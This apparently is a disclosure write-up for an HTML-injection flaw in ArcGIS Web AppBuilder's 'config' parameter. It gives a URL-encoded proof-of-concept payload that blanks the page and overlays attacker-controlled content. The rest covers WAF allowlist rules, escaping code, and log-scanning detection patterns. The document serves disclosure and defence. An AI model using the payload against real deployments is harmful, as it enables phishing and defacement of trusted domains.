
CVE-2025-67712 - Technical Analysis, Proof of Concept (PoC) and Mitigation


Executive Summary:

Product: Esri ArcGIS Web AppBuilder (Developer Edition)
Affected Versions: All versions prior to 2.30
Vulnerability Type: HTML Injection (Unauthenticated)
Severity: Medium
Status: Retired / Unsupported (EOL)

At least one public-facing deployment remained vulnerable at the time of disclosure.

Note: Since this software version has received "unsupported-when-assigned" (EOL) status, users on versions earlier than 2.30 will not receive an official patch. This write-up aims to document the vulnerability to help administrators still relying on legacy environments to implement proper mitigations.

Description:

I have discovered an HTML injection vulnerability in the Developer Edition of ArcGIS Web AppBuilder. A remote, unauthenticated attacker can craft a malicious URL that, when clicked by a victim, causes arbitrary HTML content to be rendered in the victim's browser within the context of the trusted application domain. While the absence of JavaScript execution (so this is not XSS) limits the immediate impact, the flaw enables convincing phishing and defacement attacks.

The "config" parameter (e.g. ?config=map_configuration.json) is not sanitized for HTML tags before its value is inserted into the Document Object Model (DOM).

ArcGIS Web AppBuilder Developer Edition is a widely used tool for creating custom GIS applications.

The vulnerable 'config' parameter, as seen in the Esri code (see ConfigLoader.js)

Steps to Reproduce:

1. Identify your application instance that is running ArcGIS Web AppBuilder Developer Edition (< 2.30).
2. Craft a URL with a custom HTML payload in the vulnerable "config" parameter.
3. When the crafted URL is clicked, the HTML injected through the 'config' parameter is rendered by the browser.

As a result, a vulnerable instance can be used for phishing or social engineering attacks.

Proof-of-Concept (PoC) code samples:
A) A simple HTML injection payload that will inject HTML and overwrite existing page content:

config=%3Cstyle%3Ehtml%2Chtml%20*%7Bdisplay%3Anone%21important%3Bvisibility%3Ahidden%21important%3B%7D%3C%2Fstyle%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bposition%3Afixed%21important%3Btop%3A0%21important%3Bleft%3A0%21important%3Bwidth%3A100vw%21important%3Bheight%3A100vh%21important%3Bbackground%3A%23f5f5f5%21important%3Bz-index%3A2147483647%21important%3Boverflow%3Aauto%21important%3Bmargin%3A0%21important%3Bpadding%3A0%21important%3B%27%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bmax-width%3A800px%3Bmargin%3A50px%20auto%3Bpadding%3A20px%3B%27%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bbackground%3Awhite%3Bpadding%3A30px%3Bborder-radius%3A8px%3Bbox-shadow%3A0%202px%2010px%20rgba(0%2C0%2C0%2C0.1)%3B%27%3E%3Ch1%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bcolor%3Ared%3B%27%3EINJECTED%20HEADING%3C%2Fh1%3E%3Cp%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bcolor%3A%23666%3Bmargin%3A20px%200%3B%27%3EThis%20demonstrates%20complete%20page%20takeover.%20ALL%20original%20website%20content%20is%20now%20completely%20hidden%20and%20replaced%20with%20attacker-controlled%20content.%3C%2Fp%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bbackground%3A%23fff3cd%3Bborder-left%3A4px%20solid%20%23ffc107%3Bpadding%3A15px%3Bmargin%3A20px%200%3B%27%3E%3Cstrong%20style%3D%27display%3Ainline%21important%3Bvisibility%3Avisible%21important%3B%27%3E%E2%9A%A0%EF%B8%8F%20Critical%20Security%20Issue%3C%2Fstrong%3E%3Cbr%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3B%27%3E%3Cspan%20style%3D%27display%3Ainline%21important%3Bvisibility%3Avisible%21important%3B%27%3EAn%20attacker%20has%20full%20control%20over%20what%20users%20see.%20They%20could%20display%20any%20content%2C%20including%20phishing%20forms%2C%20malicious%20links%2C%20or%20fake%20system%20messages.%3C%2Fspan%3E%3C%2Fdiv%3E%3Ch2%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3B%27%3EWhat%20an%20attacker%20could%20do%3A%3C%2Fh2%3E%3Cul%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bline-height%3A1.8%3B%27%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EDisplay%20convincing%20phishing%20forms%20that%20look%20legitimate%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EShow%20fake%20security%20warnings%20to%20trick%20users%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EReplace%20your%20entire%20website%20with%20malicious%20content%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EHarvest%20credentials%20while%20appearing%20to%20be%20your%20site%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EDistribute%20malware%20or%20redirect%20to%20malicious%20sites%3C%2Fli%3E%3C%2Ful%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

The effect of rendering the HTML on an affected version of Web AppBuilder.

Mitigation:

As noted in the official CVE description, there is no evidence of JavaScript execution, which rules out classic Cross-Site Scripting (XSS) attacks such as cookie theft. However, meaningful impact remains: attackers can inject <iframe> or <form> tags to mimic login prompts and steal credentials. Users are more likely to trust the malicious content because the browser's address bar shows a legitimate, trusted domain.

Since the product is retired and unsupported, the following steps are recommended, in line with Esri's official guidance: "Customers are encouraged to migrate from ArcGIS Web AppBuilder at their earliest convenience to ArcGIS Experience Builder, the recommended migration path" [1].

If migration to a newer product is not possible for you, identify all configuration files your deployment actually uses (e.g. config1.json, config2.json, config3.json) and make sure they are the only values allowed by the WAF. Any request containing something like "?config=%3Cstyle%3E" should be blocked.

Use the following Nginx / Apache+ModSecurity rules as a simple hotfix.

server-config.conf
# Apache + ModSecurity mitigation (place it where your other ModSecurity rules load).
# Allowlist every config file actually in use; any other value of ?config= is denied.
# ModSecurity URL-decodes ARGS before matching, so encoded variants are compared decoded.
SecRule ARGS:config "!@rx ^(config\.json|config1\.json)$" \
    "id:100001,phase:2,deny,status:403,log,msg:'Invalid config parameter'"

# Nginx (inside the server or location block that serves the application).
# nginx does not allow nested "if" blocks, so the "parameter absent or empty"
# case is handled by making the whole allowlist group optional. $arg_config is
# the raw (still percent-encoded) value, so encoded payloads also fail the match.
if ($arg_config !~ "^(config\.json|config1\.json)?$") {
    return 403;
}
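The WAF rules above work at the edge; the same allowlist belongs in the application as defense in depth, together with markup-safe rendering of anything echoed back from the query string. The following is an added example, not Esri's code and not taken from ConfigLoader.js: the allowlisted file names are constructed, and the assumption that the rejected value is echoed into an error message is a hypothetical stand-in for whatever the real page does with the parameter. It uses only standard browser APIs (URLSearchParams) and runs unchanged under Node.js.

```javascript
// Added example (not Esri's code): application-side allowlist for ?config=
// plus markup-safe rendering. Allowlist entries and the error-message
// behaviour are constructed assumptions, not the product's real logic.

const ALLOWED_CONFIGS = new Set(['config.json', 'config1.json']); // constructed
const DEFAULT_CONFIG = 'config.json';

// Resolve the config file to load from the page's query string.
// Returns the file name, or null when the value is not an exact allowlist
// match. Rejecting rather than "cleaning" is the point: markup, paths and
// any encoding trick all fail the exact match after one decode.
function resolveConfigParam(search) {
  const value = new URLSearchParams(search).get('config'); // percent-decoded once
  if (value === null || value === '') return DEFAULT_CONFIG;
  return ALLOWED_CONFIGS.has(value) ? value : null;
}

// HTML-escape for the cases where a value really must go through innerHTML.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical vulnerable pattern: the raw parameter is concatenated into
// innerHTML, so a <style>/<div> payload is parsed as markup and rendered.
function renderErrorUnsafe(node, value) {
  node.innerHTML = 'Unable to load configuration: ' + value;
  return node.innerHTML;
}

// Hardened pattern: escape before innerHTML (or, better still, assign to
// node.textContent, which never parses markup at all).
function renderErrorSafe(node, value) {
  node.innerHTML = 'Unable to load configuration: ' + escapeHtml(value);
  return node.innerHTML;
}

// Minimal stand-in for a DOM element so the functions run outside a browser.
function fakeNode() {
  return { innerHTML: '', textContent: '' };
}

// Walk a shortened form of the PoC's opening <style> tag through both paths.
function demo() {
  const rawPoc = '?config=%3Cstyle%3Ehtml%7Bdisplay%3Anone%7D%3C%2Fstyle%3E'; // constructed
  const decoded = new URLSearchParams(rawPoc).get('config');
  return {
    resolved: resolveConfigParam(rawPoc),           // null: rejected before use
    unsafe: renderErrorUnsafe(fakeNode(), decoded), // still contains a live <style> tag
    safe: renderErrorSafe(fakeNode(), decoded),     // contains &lt;style&gt; instead
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The allowlist check runs before the value is used for anything, so a rejected value never reaches the loader or the error path; the escaping only matters for the message shown when loading fails, and textContent is the simpler choice whenever the text does not need markup.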

Monitoring and Detection

To identify potential exploitation attempts, administrators should inspect web server access logs and WAF telemetry for requests containing the config parameter paired with HTML-specific characters or tags.

Generic Indicators of Compromise (IoC):

  • Unexpected GET requests with config= parameter.
  • URL-encoded characters: %3C (<), %3E (>), %22 ("), %27 (').
  • Inclusion of unusual strings such as script, alert, or onerror within the parameter value.

Sample Log Analysis Command (Linux/Unix):

grep -Ei "config=.*(%3C|%3E|%22|%27|<|>|script)" /var/log/access.log
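The grep above matches the percent-encoded text as it sits in the log, so it needs -i to catch lowercase hex such as %3c and still cannot tell an allowlisted file from an unexpected one. The following is an added example (not part of the advisory) that decodes the config value once, as the browser does, and then applies both the IoC list above and an allowlist. The log lines are constructed samples in the Combined Log Format; the allowlisted file names are an assumption.

```javascript
// Added example (not from the advisory): scan access-log lines for
// HTML-injection attempts in the "config" parameter. Sample lines and the
// allowlist are constructed for the example.

const SAMPLE_LOG = `
203.0.113.10 - - [07/Jan/2026:10:00:01 +0000] "GET /webappviewer/index.html?config=config1.json HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [07/Jan/2026:10:00:05 +0000] "GET /webappviewer/index.html?config=%3Cstyle%3Ehtml%7Bdisplay%3Anone%7D%3C%2Fstyle%3E HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.12 - - [07/Jan/2026:10:00:09 +0000] "GET /webappviewer/index.html?config=%3ciframe%3e HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.13 - - [07/Jan/2026:10:00:12 +0000] "GET /webappviewer/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.14 - - [07/Jan/2026:10:00:15 +0000] "GET /webappviewer/index.html?config=other.json HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
`;

// Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
const LOG_LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^" ]+)[^"]*" (\d{3})/;
const ALLOWED_CONFIGS = new Set(['config.json', 'config1.json']); // constructed
const MARKUP_RE = /[<>"']/;            // the IoC characters, checked after decoding
const KEYWORD_RE = /script|alert|onerror/i; // the IoC keywords from the list above

function parseLogLine(line) {
  const m = LOG_LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, timestamp, method, target, status] = m;
  const q = target.indexOf('?');
  const query = q === -1 ? '' : target.slice(q + 1);
  return { ip, timestamp, method, target, status: Number(status), query };
}

// Classify one decoded config value; null means nothing to report.
function classifyConfigValue(value) {
  if (value === null) return null; // request carried no config parameter
  if (MARKUP_RE.test(value) || KEYWORD_RE.test(value)) return 'html-injection-attempt';
  if (!ALLOWED_CONFIGS.has(value)) return 'config-not-allowlisted';
  return null;
}

// Return one finding per suspicious request: who, when, why, and the decoded value.
function scanAccessLog(text) {
  const findings = [];
  for (const raw of text.split('\n')) {
    const entry = parseLogLine(raw.trim());
    if (!entry) continue;
    // URLSearchParams percent-decodes once, so %3C and %3c both become "<".
    const value = new URLSearchParams(entry.query).get('config');
    const reason = classifyConfigValue(value);
    if (reason) findings.push({ ip: entry.ip, timestamp: entry.timestamp, reason, value });
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
}
```

Two findings are flagged as injection attempts (including the lowercase-hex one a case-sensitive grep would miss) and one as a non-allowlisted file name, which is lower priority but worth reviewing since it should never occur in a deployment whose config files are known.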

Disclosure Timeline

2025-11-29 Vulnerability discovered and reported.
2025-12-05 Vulnerability validated; CVE-2025-67712 assigned.
2025-12-19 CVE published by ESRI CNA.
2026-01-07 Technical write-up published.

Thanks to Esri/ArcGIS and CERT.PL for their quick, professional responses and communication.

🔗 References & Additional Resources

Note: Always verify mitigation rules in a staging environment before deploying to production.
